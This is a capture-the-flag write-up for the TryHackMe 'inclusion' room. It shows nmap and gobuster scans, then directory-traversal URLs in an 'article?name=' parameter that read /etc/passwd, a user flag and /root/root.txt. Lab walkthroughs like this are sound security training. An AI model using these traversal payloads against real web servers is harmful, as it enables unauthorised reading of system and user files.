TryHackMe CTF: inclusion (Easy)

Exploits a simple Local File Inclusion (LFI) vulnerability in a web application’s article parameter to read sensitive system files. Leverages directory traversal via ../../../../ syntax to access /etc/passwd for user enumeration and read both user and root flag files directly.

Categories:

Ctf Thm

Tags:

Ctf Nmap Gobuster Dirbuster Lfi Local-File-Inclusion

URL: https://tryhackme.com/room/inclusion Easy

PHASE 1: Reconnaissance

Description of the room:

This is a beginner level room designed for people who want to get familiar with Local file inclusion vulnerability.
If you have any kind of feedback please reach out to me on twitter at 0xmzfr

PHASE 2: Scanning & Enumeration

Running: `nmap`

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Also see: nmap.log

Running: `gobuster`

Ran the following:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/article              (Status: 500) [Size: 290]

See also: gobuster.log

PHASE 3: Gaining Access

What we discover is there is only one folder on this server (that is /article) and as a name argument, it seems to take a file name.

So, we go back, back, back up a few directories to see if we can get the web server to print out the contents of other interesting files on the server.

STEP 1: Find usernames

http://10.10.110.200/article?name=../../../../etc/passwd

STEP 2: Get unprivileged user flag

http://10.10.110.200/article?name=../../../../home/falconfeast/user.txt

STEP 3: Get root flag

http://10.10.110.200/article?name=../../../../root/root.txt

By using this technique, we were able to get a value username (falconfeast) and read the user.txt file, and also step into the /root folder to read the root.txt file. The contents of those files were the two flags for this room.